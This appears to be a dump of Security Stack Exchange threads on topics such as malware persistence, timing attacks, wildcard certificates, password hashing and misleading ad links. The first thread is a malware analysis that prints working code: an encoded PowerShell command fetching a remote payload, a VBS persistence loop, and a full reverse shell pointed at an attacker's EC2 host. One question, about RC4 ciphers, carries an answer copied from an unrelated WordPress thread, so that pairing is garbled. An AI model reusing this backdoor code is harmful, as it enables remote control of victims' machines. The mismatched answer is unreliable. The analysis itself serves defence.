if %PROCESSOR_ARCHITECTURE%==AMD64( START /B %WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA== ) EDIT : I tried formatting my PC. It seems like a spyware from prpops.com (NSFW) is installed on my system without any notice. The config file which used to start on my PC is still there even after I formatted my PC. Here is a little code that it runs through which above bat file used to run. Dim WinScriptHost
WScript.Sleep(30000)
Set WinScriptHost = CreateObject("WScript.Shell")
WinScriptHost.Run Chr(34) & "%USERPROFILE%\appdata\file.bat" & Chr(34), 0
While True
set service = GetObject ("winmgmts:")
running = 0
for each Process in Service.InstancesOf ("Win32_Process")
If Process.Name = "powershell.exe" then
running = running + 1
End If
next
If running < 1 then
WinScriptHost.Run Chr(34) & "%USERPROFILE%\appdata\file.bat" & Chr(34), 0
End If
WScript.Sleep(120000)
Wend
Set WinScriptHost = Nothing Please tell if this auto-downloads the script or stores it in any way in memory? | Short version The attacker is able to run any PowerShell commands on your machine and can be found by getting the owner of " ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com ". Long version I dumped the binary array into a file and uploaded it to VirusTotal . The newly launched file seems like an additional stage to me since it is really small (1.7 kb) and will be executed for 10 seconds only since it will be bound to PowerShell (since the attacker creates a thread instead of launching it as a separate process) and the termination is delayed by 10 secs at the last command. Update: I'm sadly unable to reverse-engineer assembly, but a quick look at the file using a text editor revealed the following string: powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(
'A really long base64 full code can be found below'));
IEX (New-Object IO.StreamReader(
New-Object IO.Compression.GzipStream($s,
[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();) However, this stage also utilizes GZIP as an additional obfuscation layer on top of Base64, but it can still be dumped to: # Powerfun - Written by Ben Turner & Dave Hardy
function Get-Webclient
{
$wc = New-Object -TypeName Net.WebClient
$wc.UseDefaultCredentials = $true
$wc.Proxy.Credentials = $wc.Credentials
$wc
}
function powerfun
{
Param(
[String]$Command,
[String]$Sslcon,
[String]$Download
)
Process {
$modules = @()
if ($Command -eq "bind")
{
$listener = [System.Net.Sockets.TcpListener]9999
$listener.start()
$client = $listener.AcceptTcpClient()
}
if ($Command -eq "reverse")
{
$client = New-Object System.Net.Sockets.TCPClient("ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com",9999)
}
$stream = $client.GetStream()
if ($Sslcon -eq "true")
{
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
$sslStream.AuthenticateAsClient("ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com")
$stream = $sslStream
}
[byte[]]$bytes = 0..20000|%{0}
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
if ($Download -eq "true")
{
$sendbytes = ([text.encoding]::ASCII).GetBytes("[+] Loading modules.`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
ForEach ($module in $modules)
{
(Get-Webclient).DownloadString($module)|Invoke-Expression
}
}
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
$data = $EncodedText.GetString($bytes,0, $i)
$sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
$sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
$x = ($error[0] | Out-String)
$error.clear()
$sendback2 = $sendback2 + $x
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()
$listener.Stop()
}
}
powerfun -Command reverse -Sslcon true This is a rather simple PowerShell backdoor which connects to a server and then allows the attacker to remotely run PowerShell commands on your machine. This "powerfun" script can be found on GitHub with two seconds of googling, so I won't link it here so as not to stretch the anti-spam limits. However, by comparing it to the original script, you'll quickly notice that the attacker changed the remote server address to " ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com " and the port to 9999 , so it should be easy to track the attacker if needed.
able to control your computer! | {
"source": [
"https://security.stackexchange.com/questions/160372",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/149284/"
]
} |
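For reference, payloads like the ones quoted above can be unpacked for analysis on an isolated machine: PowerShell's -Enc argument is Base64 over UTF-16LE text, and the second stage adds a GZIP layer. The sketch below uses a harmless self-generated blob so it runs as written; you would paste the real strings in its place.

import base64, gzip

def decode_enc(blob: str) -> str:
    # PowerShell -Enc payloads are Base64-encoded UTF-16LE text.
    return base64.b64decode(blob).decode("utf-16-le")

def decode_gzip_b64(blob: str) -> str:
    # The second stage wraps the script in GZIP inside Base64.
    return gzip.decompress(base64.b64decode(blob)).decode("utf-8", "replace")

# Harmless demonstration payload standing in for the real blobs above.
demo = base64.b64encode("Write-Output 'hello'".encode("utf-16-le")).decode()
print(decode_enc(demo))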
160,473 | For laptops with full disk encryption or home folder encryption, one of the risks if it is stolen while in sleep mode is that the encryption key is stored in memory and can be read if an attacker knows how. To me, it seems that, in theory, operating systems should be able to have a "secure sleep" option where the key is erased from memory prior to sleep mode, and on resume, the user must provide a password to unlock the encryption key, as through a cold boot. All processes except the lock screen would be prevented from continuing until the encryption key is restored to memory. I realize that this would mean that the computer cannot do any scheduled tasks in sleep mode, but most users probably wouldn't care about that. And maybe drivers or other obstacles would prevent this from being realistic. Are there any reasons why a "secure sleep" option cannot be easily implemented? | Yes. It could be easily achievable, although it would require kernel support do this properly. In the suspend-to-RAM case, the key should be deleted from the RAM, and in the suspend-to-disk case, from the RAM and also from the disk (or it can be stored encrypted on the disk). A minimal input should be also provided to get the key/reauthentication credentials in the early boot/wakeup stage. I don't see any technical obstacles; the probable reason that it wasn't developed until now was the lack of interest. Scenarios where direct RAM access of a working laptop is a real security risk are very rare. | {
"source": [
"https://security.stackexchange.com/questions/160473",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/24537/"
]
} |
160,496 | Suppose, a user can click a button on a website and downloads a file with a secret. Via ajax. Is it more secure if a server generates that file and sends it as 1) zip, tar or the like -- a binary file. Content type: application/octet-stream or application/zip or something similar. 2) or as a plain text file? Content type: text/plain. Note that in the 1) case, zip/tar whatever isn't protected by a password. HTTPS is used in both cases. | There isn't really a difference. If you use proper TLS encryption, neither can be read by a man in the middle, and if the server properly authenticates requests, nobody who is not allowed to will be able to download the file. If you don't use proper TLS or do not properly authenticate users, an attacker could read the file in both cases. You definitely should not use non-password protected zipping as a security measure. | {
"source": [
"https://security.stackexchange.com/questions/160496",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/32926/"
]
} |
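A rough sketch of that point: the protection comes from TLS plus an authentication check on the download endpoint, not from the Content-Type. The session store, file name, and return convention are assumptions for the example.

SESSIONS = {}   # session_token -> username, maintained by the login code

def handle_download(session_token: str):
    # Returns (status, headers, body) for the secret-file download.
    if SESSIONS.get(session_token) is None:
        return 401, {}, b""                      # not authenticated
    with open("secret.txt", "rb") as f:          # assumed file name
        body = f.read()
    # text/plain would be just as safe; the transport and the check above
    # are what matter, not the chosen Content-Type.
    return 200, {"Content-Type": "application/octet-stream"}, body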
160,692 | Well, I only have two examples, but it seems to be a slowly growing thing. First, I noticed that hotmail.com/live.com started to do this - ask for the email address on the first screen, and then you have to click 'next' and then enter your password. ... Man, is this annoying! At least trusty gmail knows good UX. A few months later gmail is doing the same thing. So, I assume there is a security reason for this workflow because it can't be for UX (?) But what is the reason? Is it to do with tricking bots/making their life more difficult? | Security / Privacy disadvantage There are security and privacy risks involved with this approach when it is badly implemented. An attacker could figure out whether an email address or login already exists when there is no uniform default flow. As mentioned by @Mario Trucco, this can also be done via the registration process. Security is at risk because it becomes easier for an attacker to bruteforce their way into a system. It will make guessing easier if you only need to guess a password, instead of both the username and password. The privacy of users is at risk. (Other people will know if you are listed at that website.) Reasons why this is implemented I found this in the Google documentation : This new Google account sign-in flow will provide the following advantages: Preparation for future authentication solutions that complement
passwords A better experience for SAML SSO users, such as university students or corporate users that sign in with a different identity provider than Google Security Advantage It may enable more personalized customization options for security, such as phrases or images, providing more security options (see the example below). This would reduce the scope of phishing, as the screen generated would be specific to the user and would vary from user to user. Because users can have different ways of authenticating and the identity of the user is tied to the username, this will make it easier server-side to redirect traffic to the user's form of authentication. Example image (not shown): The user sees his/her personal image or sound. If that image does not correspond with the image given at registration, the user knows this is a fake login. | {
"source": [
"https://security.stackexchange.com/questions/160692",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/149518/"
]
} |
160,737 | I have the Netflix account in our family, meaning I have the password. It's a secure password, with 16 characters, including symbols, numbers and uppercase, for example 3?TeJ)6RK]4Z_a>c , which has around 80 bits of entropy. However, I have to share this password with other members of the family, so they can also login to it. Is using WhatsApp or Facebook Messenger secret conversation an acceptable method for this? Are there better methods? | Both Facebook Messenger (using secret conversations) and WhatsApp implement end-to-end encryption, which means that when you send a message your text is encrypted on your computer and decrypted on the destination computer. The text of your messages is not visible to anyone in between unless they break the encryption, which for practical purposes is not going to happen (unless you happen to be the subject of a national security investigation, in which case you've got bigger problems than sharing your Netflix password with the wonks at the NSA). However, beware that end-to-end encryption only protects the communication channel itself. It does not protect you from threats such as: Malware, such as keyloggers or screen grabbers that have been installed on your machine or the destination machine Friends/family who decide to re-share or change your password without your permission Netflix, who monitors these things and will see that your account is being used in multiple geographic places and thus probably being shared against their terms of service. Netflix has plans that allow multiple streams among family members, so this in itself is not an actionable issue unless your password is somehow shared widely. Law enforcement, if you happen to live in an area that has criminalized password sharing As pointed out by daniel in the comments, Facebook (who owns both Facebook Messenger and WhatsApp) might accidentally provide weak security or be complicit in breaking user security (e.g. in order to assist a law enforcement investigation). As proprietary applications (not open source) neither of these softwares have been vetted by outside security researchers, so Facebook might have a poor implementation or they might be copying/inspecting your data at either the source or destination device. Additionally, since these applications create and control the encryption keys used to implement the end-to-end encryption, you must assume that Facebook can break the encryption if they so desire (or anyone they would give the keys to, e.g. law enforcement). Another excellent point from Gert van den Berg in the comments: some messaging apps will automatically back up to the cloud. The security around cloud storage is not nearly as strong as the end-to-end encryption used in the communications channel. See, for example, the Fappening attacks for more info as to how the cloud represents a threat to data privacy. (Even for supposedly deleted data!) | {
"source": [
"https://security.stackexchange.com/questions/160737",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/40114/"
]
} |
160,808 | From man 3 memcmp : Do not use memcmp() to compare security critical data, such as
cryptographic secrets, because the required CPU time depends on the
number of equal bytes.
Instead, a function that performs comparisons in constant time is required. Why is that so? My thinking is that if someone has access to the machine that processes this "security critical data," then these secrets are already compromised because that person can extract them from RAM. Or, if that person has no access to the machine, then they cannot accurately measure CPU time anyway. | Exploiting timing information is one possible attack against things like password authentication systems. Conceptually memcmp() works by comparing two sets of binary data on a byte-by-byte basis (in reality processors can compare multiple bytes at a time, depending on optimizations, but the same principles below will apply). The function starts at the beginning of the data, compares each byte sequentially, and exits as soon as it finds a difference. If no difference is found then the function returns a code indicating that the data matches. Because the function returns as soon as it finds a difference, an attacker with a sufficiently accurate clock can deduce secret information. They can induce calls to memcmp() with different inputs and by measuring which inputs take longer they can deduce what a stored secret might be. Example: Consider a classical password hashing system. Suppose your password is stored as a secret hash, say for example Ek8fAMjPhBo . (That hash was generated using the DES scheme provided by the Linux crypt() function with a salt of na and a password of secret . Note that this function is insecure and you should not use it in real systems.) In a strong password system your hash Ek8fAMjPhBo is stored, but your password is not stored. When you are asked to authenticate the system will take your password, hash it, and then compare the two hashes to one another. If the resultant hashes match then you are granted access to the system, if the hashes do not match then your password is rejected. This allows the system to check to see whether or not you know your password without actually storing the password itself. How an attacker can use timing to attack this system: In order to attack this system an adversary really just needs to figure out what password hashes to the stored hash. Normally the stored hash is kept secret, but the adversary can use timing information to deduce what the stored hash could be. Once the adversary deduces the stored hash it is vulnerable to much faster and off-line rainbow table attacks, as well as circumventing on-line security measures like password retry limits. The password system above has to compare a candidate hash against the stored hash in order to function properly. Suppose it takes 10 nanoseconds to compare each byte of the candidate hash to the secret stored hash. If no bytes match (one comparison) then memcmp() will take about 10ns. If one byte matches (two comparisons) then memcmp() will take about 20ns. Your attacker generates a few passwords and runs them through the system, recording how long each one takes. Suppose the first few hash comparisons take about 10ns each and then return, indicating that none of the bytes of the candidate hash match the stored hash. After a few tries one of the hash comparisons takes 20ns- which indicates that the first byte of the candidate hash matches the stored hash. In the example above this indicates that the attacker has deduced that the first byte of the hash Ek8fAMjPhBo is E . 
Hashes by design have the property that you can't predict what hash will correspond to what password, so for example this does not tell the attacker that the password starts with s . However, the attacker could have a large table of pre-computed hashes (a rainbow table ) so they can look up other passwords that hash to a string starting with E . After they try enough hashes they'll eventually get an input that causes memcmp() to take 30ns, which indicates that the first two bytes match, and they have deduced that the first two bytes of the hash are Ek . They repeat this process over and over until they deduce all or most of the hash. At that point they either know the password or can brute force it with a traditional rainbow table attack. This is a little hypothetical, but you can find lots of practical information about timing attacks elsewhere on the net, for example: https://research.kudelskisecurity.com/2013/12/13/timing-attacks-part-1/ | {
"source": [
"https://security.stackexchange.com/questions/160808",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/108649/"
]
} |
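As a footnote to the timing-attack answer above: most languages ship a ready-made constant-time comparison, so there is no need to roll your own. A minimal Python sketch (the stored value is the hash from the example; the naive loop is only there to illustrate memcmp's early exit, not for real use):

import hmac

def naive_compare(a: bytes, b: bytes) -> bool:
    # Mirrors memcmp(): returns at the first mismatching byte, so the
    # running time leaks how long the matching prefix is.
    if len(a) != len(b):
        return False
    for x, y in zip(a, b):
        if x != y:
            return False
    return True

def constant_time_compare(a: bytes, b: bytes) -> bool:
    # hmac.compare_digest() examines every byte no matter where the first
    # difference sits, so timing reveals nothing about its position.
    return hmac.compare_digest(a, b)

stored = b"Ek8fAMjPhBo"    # stored hash from the example above
guess = b"Ek8fXXXXXXX"     # attacker-controlled candidate
print(naive_compare(stored, guess), constant_time_compare(stored, guess))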
160,879 | On Code Review stack exchange, in response to code that informs the user when their login attempt failed because of too many login attempts from an IP, I was told "Absolutely do not message end user telling them why login failed.
You are giving a potential attacker critical information to aid them
in attacking you application. Here you give an attacker very precise
information to get around your IP restriction." https://codereview.stackexchange.com/a/164608/93616 Am I practicing bad security? Should I explain in more vague terms like "Too many login attempts" or "You could not be logged in"? Update : In case there's any ambiguity, currently the too many attempts logic and message does not care if the attempts were successful or not. | Absolutely do not message end user telling them why login failed. You are giving a potential attacker critical information to aid them in attacking you application. On the other hand, not telling a user why their login failed is a potential usability disaster. If you don't clarify whether the user's IP was banned or the user instead used a wrong password, they might panic since it seems to them that someone accessed their account and changed the password to lock them out. If my login with a pre-filled password fails, the first thing I'm thinking of is a break-in rather than an IP block. Also, a naive IP blocking mechanism might be ineffective and introduce additional problems. It is potentially trivial to bypass for an attacker with sufficient resources and someone who shares an IP address with other users might abuse the IP ban to lock out others. Instead, a CAPTCHA after n failed attempts per IP might be a softer solution and more appropriate for your application. Also see: Is it good practice to ban an IP address if too many login attempts are made from it? Why do people use IP address bans when IP addresses often change? | {
"source": [
"https://security.stackexchange.com/questions/160879",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/91316/"
]
} |
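A rough sketch of the softer approach suggested above: count failures per IP and demand a CAPTCHA instead of hiding the reason for the failure. The window, the threshold, the in-memory store and both helper functions are placeholders for illustration, not a reference implementation (Python):

import time
from collections import defaultdict

FAILURE_WINDOW = 15 * 60     # seconds to remember failed attempts per IP
CAPTCHA_THRESHOLD = 5        # failures before a CAPTCHA is demanded

_failures = defaultdict(list)   # ip -> timestamps; use a shared store in production

def _recent_failures(ip: str) -> list:
    now = time.time()
    _failures[ip] = [t for t in _failures[ip] if now - t < FAILURE_WINDOW]
    return _failures[ip]

def captcha_passed(answer) -> bool:
    return answer == "expected"      # placeholder: verify with your CAPTCHA provider

def credentials_valid(username: str, password: str) -> bool:
    return False                     # placeholder: check the hash in your user store

def login(ip: str, username: str, password: str, captcha_answer=None) -> str:
    if len(_recent_failures(ip)) >= CAPTCHA_THRESHOLD and not captcha_passed(captcha_answer):
        return "Too many attempts from your network: please solve the CAPTCHA."
    if not credentials_valid(username, password):
        _recent_failures(ip).append(time.time())
        return "Wrong username or password."   # honest, specific feedback
    return "Logged in."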
160,991 | We recently setup a two tier internal certificate authority. We also disseminate Root CAs via Active Directory so certificates from our internal CA are automatically trusted by every (Windows) system in our network. Our devs need SSL certificates for their local workstations. One option would be to generate a wildcard certificate to them like *.foo.bar.com . The benefits are ease of implementation and future proof-ness (if we create new subdomains in the future, it covers them automatically). However, the flip side is if we were to issue a wildcard certificate, how can you be certain that a malicious employee won't abuse it? Imagine a situation where a malicious dev sets up a website on their local workstation (mail.foo.bar.com) and can somehow either also poison DNS or modify a user's local host file. That wildcard certificate lends credibility to their malicious website, making it look more authentic. Am I being overly paranoid? Should we issue wildcards and make certificate maintenance easier or should we generate unique certificates for every DNS name to limit the scope of use? Anybody have any thoughts? Experiences? EDIT To me it seems there are two very good solutions posted here: Separate dev/test and production into independent CAs as recommended by @Kotzu. For us personally I can't justify setting up a second CA just for that purpose. It's too much effort for the number of certificates we have (40 total of which 10-20 are dev). That said, I totally think its the best answer. Modify the DNS naming structure as recommended by @immbis so that the "dev" portion of the name is the subdomain not the sub-subdomain. Thus making the wildcard more obviously a dev domain. This would alleviate my concerns about issuing wildcard certificates to a great extent. Then impersonation can only occur for *.dev.ourdomain.com - which I'm ok with. That said, we just have it hard coded too many places to make this practical. I think what we'll end up doing is continue to issue fully qualified SSL certificates to each dev. That feels safer as it leaves a lot less wiggle room for a malicious person to abuse/impersonate a legitimate resource. This entire situation is a bit of a tails case anyway. I hope our devs generally aren't acting maliciously and trying to set up bogus sites. I just don't want to be handing out trusted wildcard certs like free candy only to later have them be ab/used some unexpected way. If we need more and more certificates and issuing individual certificates becomes unmanageable then we'll consider setting up a second CA that's only trusted by the dev workstations (not the whole company) and issuing new wildcard certs. | I think you should segregate your environment. Only production certificates should be trusted on all your network. Dev and testing certificates should only be trusted on the computers where developers work.
In a more secure environment you would not even use the same root CA for production and development environments. | {
"source": [
"https://security.stackexchange.com/questions/160991",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/1928/"
]
} |
161,037 | We received a large number of error messages from our django application, like this: Invalid HTTP_HOST header: ‘target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}curl${substr{10}{1}{$tod_log}}-o${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce${substr{10}{1}{$tod_log}}69.64.61.196${substr{0}{1}{$spool_directory}}rce.txt}} null)’. The domain name provided is not valid according to RFC 1034/1035.
...
Request information:
GET: action = u'lostpassword'
POST: user_login = u'admin' wp-submit = u'Get New Password'
FILES: No FILES data
COOKIES: No cookie data
... I have not seen anything like it before, and I'm having trouble figuring out what it means. Could this be part of some exploit, or am I just being paranoid? | To expand on the answer provided by @Swashbuckler, CVE-2017-8295 specifically relates to WordPress password resets with the HOST HTTP header set. When WordPress sends out password reset emails, they set the From / Return-Path to the value of $_SERVER['SERVER_NAME'] (in PHP). This value is set by some web servers (e.g. Apache) based on the HOST HTTP header. This means that attackers can make WordPress send out emails that have From / Return-Path set to an email address of their choosing. If the email is bounced or responded to, it will happen to this malicious email address and - if the original email was attached - the attacker will then have access to the password reset link. Actually abusing the exploit requires two factors to happen: the web server must read the hostname from the HOST header, and the email must be bounced or replied to. The former can be fixed by the server admin (if using Apache, by setting UseCanonicalName On ), the latter requires the attacker to somehow block the victim's mail server (e.g. by DoS'ing it) or for the victim to reply to the email. As pointed out by @TerrorBite, the attackers aren't actually targeting the password reset links, but only using the bug to exploit a bug in the PHP mail() function. See his answer below. | {
"source": [
"https://security.stackexchange.com/questions/161037",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/149887/"
]
} |
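On the Django side of the question, the logged error itself shows that host-header validation is already rejecting these requests. A minimal settings sketch, assuming a typical Django deployment (the hostnames are placeholders, and the logging block uses Django's django.security.DisallowedHost logger), that keeps the protection while quieting the noise:

# settings.py (sketch); the hostnames below are placeholders for your real domains.
ALLOWED_HOSTS = ["example.com", "www.example.com"]

# Requests whose Host header is not listed are rejected before reaching any
# view, which is exactly what produces the "Invalid HTTP_HOST header" entries.
# If the resulting error mails become too noisy, the security logger for these
# rejections can be routed to a null handler:
LOGGING = {
    "version": 1,
    "disable_existing_loggers": False,
    "handlers": {"null": {"class": "logging.NullHandler"}},
    "loggers": {
        "django.security.DisallowedHost": {"handlers": ["null"], "propagate": False},
    },
}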
161,046 | My email provider still supports old SSL_RSA_WITH_RC4_128_SHA ciphers. What does that mean for me? If I use an updated system (Ubuntu 16.04) and an updated client (Thunderbird 52), shouldn't it use this ciphers? But when there is someone with an older system, he would still be able to connect to the server and would not be rejected and send his credentials and content with bad encryption. Is that the unique problem? | To expand on the answer provided by @Swashbuckler, CVE-2017-8295 specifically relates to WordPress password resets with the HOST HTTP header set. When WordPress sends out password reset emails, they set the From / Return-Path to the value of $_SERVER['SERVER_NAME'] (in PHP). This value is set by some web servers (e.g. Apache) based on the HOST HTTP header. This means that attackers can make WordPress send out emails that have From / Return-Path set to an email address of their choosing. If the email is bounced or responded to, it will happen to this malicious email address and - if the original email was attached - the attacker will then have access to the password reset link. Actually abusing the exploit requires two factors to happen: the web server must read the hostname from the HOST header, and the email must be bounced or replied to. The former can be fixed by the server admin (if using Apache, by setting UseCanonicalName On ), the latter requires the attacker to somehow block the victim's mail server (e.g. by DoS'ing it) or for the victim to reply to the email. As pointed out by @TerrorBite, the attackers aren't actually targeting the password reset links, but only using the bug to exploit a bug in the PHP mail() function. See his answer below. | {
"source": [
"https://security.stackexchange.com/questions/161046",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/149900/"
]
} |

161,059 | Disclaimer: I'm a computer programmer, not a security analyst or anything to do with security. I have zero experience in the world of cryptography, so bear with me please. Situation: I was given the task to integrate a client's site with a data hosting site. While working on that, I stumbled upon a query that dumps all users' data. To make this query, the user has to 'authenticate' to get a session and use that session code to make this query, which then checks that the user has admin privileges before completing the query and responding. But still... that seems sort of horrible to me. Especially since this is some of the data that is sent back if the query is successfully run: "username": "[email protected]",
"firstname": "Test",
"lastname": "Name",
"userpassword": "$1$te000000$qMpAriadAHuRyDkK58YKS0" There is more data returned that is horrible to expose, but that's not my primary concern. Clearly no person has ever been named "Test Name", and "testemail.blerg" is not a registered domain, let alone "blerg" being a possible top-level domain. Even if it were, that account has been deleted from the data hosting site and cannot log in. The password that was used is a weak, test-case one, and is not in-use by anyone. Is is possible for me to brute-force/rainbow-table (while I don't have experience, I know some flash-words :P) or something to get the password from that? What little (I think) I know is that the first part of the userpassword is the MD5 salt, but I don't know anything else. If anyone can explain how easy it is, I can prove to my boss that this site is completely horrible and convince our client to migrate from this data hosting site. There is more that I do know about the salting (i.e. how it gets the salt, what language/function it's using, etc), but I'd like to see how easily someone who doesn't have access to that information can figure it out. Another thing for me to go to my boss with, hopefully. EDIT: There seems to a little confusion related to my intentionally being vague in the description, partially for the purpose of preventing any indication of which CRM this is, for legal/etc reasons. I also realize that my calling it 'data hosting' was potentially misleading, so my bad. Hopefully this clarifies: The work our team is doing is creating a basic website for a company to show off their products. The only interaction I have with the CRM is: When a person fills out the Contact Us form, we POST to the CRM a Contacts object with the user's information. Do a GET on a list of Dealers that sell their products to display. I started with #2, the GET API call, where I found out that I can query the Users table. I have not created the API, I have only been making requests of it. The GET call requires a param query= where the value is a SELECT statement in the system's query language, which is then translated to SQL (presumably preventing SQLI attacks, but I don't know how it interprets/translates to SQL, so I'm not touching that with a 10ft pole). By changing SELECT * FROM Dealers; to SELECT * FROM Users; in the query I was able to see every user's data. The way the CRM handles users is with a portal on their site. A user is created in the portal, where there is an "Is Admin" checkbox. This can be edited at any time through the portal. This is the process to making API requests: A user makes a request to the CRM, containing the username, for a token. The token is concatenated with the "secret" access key for that user, the resulting string is MD5 hashed and then sent back to request a session token. This session token is included with every request, as a querystring param, to "verify" that the request is "authorized". One of the problems is that if an 'admin' user makes a request of the Users table, the response is a list of every user with the information I listed above as well as the user's "secret" access token (and other information). So it's even worse than just exposing a password, it's practically granting access to anyone by impersonating anyone. | The password format in the userpassword attribute looks like the standard format used by various unix services, such as the default system password service which stores hashed passwords in /etc/shadow . 
The format is basically: $ type $ salt $ hash In your example, the type is 1, which designates an md5 hash. There are other well-known types, such as various sizes of the sha-family hash functions. Breaking an md5 hash is almost trivial today, even when it's salted, because md5 is so fast. It's not a hash function which is safe to use for hashing passwords; hashcat and other password crackers can literally hash millions or even billions of password candidates per second. So this data store service isn't just horrible because it sends user password hashes back, it's even more horrible because it actually uses md5 hashes to store passwords. To prove to your boss that this really isn't secure, you could download hashcat and a few password lists (you can easily find them online), and then run hashcat on a computer with a very powerful GPU on all the passwords you get from the service. Make a note of how many passwords hashcat can crack (without looking at the passwords themselves - they may reveal private information about the people who chose them, and you don't want to actually know their passwords), and inform the people whose passwords were compromised that they need to choose a new password. You'll probably need to get permission to do all this first, because depending on where you live and work, this might actually be considered a malicious attack, or even be illegal. Aside : If you were stuck on using this service even after voicing your misgivings, I'd suggest that setting up an automated password cracker that runs without human intervention and informs people (by sending them an e-mail) when it manages to crack their password would be a way to protect your users from this kind of bad design. It would help to weed out weak passwords and increase the amount of time needed by a real attacker to crack passwords. Edit : Zach pointed out that the aside isn't common practice and shouldn't be attempted by someone not able to assess the risks. I fully agree with that. At the very least, if you did something like that, you should have management okay it. Still, NOT doing this doesn't make the resulting system more secure. It's the equivalent of sticking your head in the sand out of fear that if you actually did something to improve password security, it might backfire on you. We know that people choose bad passwords, and we know that md5 is not a good way to hash passwords. If we can't change these two facts, and we are in a position to weed out weak passwords, then we should probably do it to make our users safer. One important reason this isn't seen much, or even considered much, is that we usually aren't in a position to implement it. Good systems don't use fast hash functions to hash passwords, and we usually don't get access to the whole hashed password database. | {
"source": [
"https://security.stackexchange.com/questions/161059",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/124560/"
]
} |
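To see the $type$salt$hash structure from the answer above in practice, the system crypt(3) routine can be called directly. A small sketch using Python's crypt module (Unix-only and removed in Python 3.13, so treat it as illustrative); the stored hash is the one from the question and the guesses are arbitrary:

import crypt   # thin wrapper around the system crypt(3); Unix-only
import hmac

stored = "$1$te000000$qMpAriadAHuRyDkK58YKS0"    # hash returned by the API

# Everything before the final '$' is "$<type>$<salt>$": type 1 means md5crypt.
salt = stored.rsplit("$", 1)[0] + "$"            # -> "$1$te000000$"

def check(candidate: str) -> bool:
    # Re-hash the guess with the stored salt and compare in constant time.
    return hmac.compare_digest(crypt.crypt(candidate, salt), stored)

for guess in ("password", "letmein", "hunter2"):
    print(guess, check(guess))
# md5crypt is fast enough that GPU crackers can try enormous numbers of such
# guesses per second, which is why it is unsuitable for storing passwords.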
161,071 | Related: Is the Web browser status bar always trustable? How can Google search change the location in a URL tooltip? I've always thought you can "hover" over a link to see where it really goes, until today. A coworker (working from home) searched for "Target" in Google Search (using edge). He clicked the top result, which happened to be an ad, and was redirected to a phishing page posing as Microsoft trying to get him to call a "tech support" number. I got the same results on a different computer, on a different network. When I hover over the link, both links show "www.target.com" at the bottom, but clicking the ad link takes you to a malware page and the second link (first search result after the ad) takes you to the real Target.com page. If displaying the wrong URL in the tooltip requires Javascript, how did tech-supportcenter get their Javascript onto the Google search results page? UPDATE
Here's the same results in a virtual machine with a fresh install of Windows, on a different network: Here's the source for the URL. It looks like it does include the "onmousedown" Javascript as the first question I linked to mentioned. Does Google allow advertisers to display any URL they want for the tooltip? | If displaying the wrong URL in the tooltip requires Javascript, how did tech-supportcenter get their Javascript onto the Google search results page? The scammers did not manage to inject JS into the search results. That would be a cross-site scripting attack with much different security implications than misleading advertisement. Rather, the displayed target URL of a Google ad is not reliable and may conceal the actual destination as well as a chain of cross-domain redirects. The scammers possibly compromised a third-party advertiser and hijacked their redirects to lead you to the scam site. Masking link targets is a deliberate feature of Google AdWords. It is generally possible to specify a custom display URL for an ad link which can be different from the effective final URL . The idea is to enable redirects through trackers and proxy domains while keeping short and descriptive links. Hovering over an ad will only reveal the display URL in the status bar, not the real destination. Here is an example: I'm searching for "shoes". The first ad link displays www.zappos.com/Shoes : When I click on it, I actually get redirected multiple times: https:// www.googleadservices.com /pagead/aclk?sa=L&ai=DChXXXXXXXd-6bXXXXXXXXXXXXkZw&ohost=www.google.com&cid=CAASXXXXXp8Yf-eNaDOrQ&sig=AOD64_3yXXXXXXXXXXXXXYX_t_11UYIw&q=&ved=0aXXXXXXHd-6bUXXXXXXXXXwIJA&adurl=
-- 302 -->
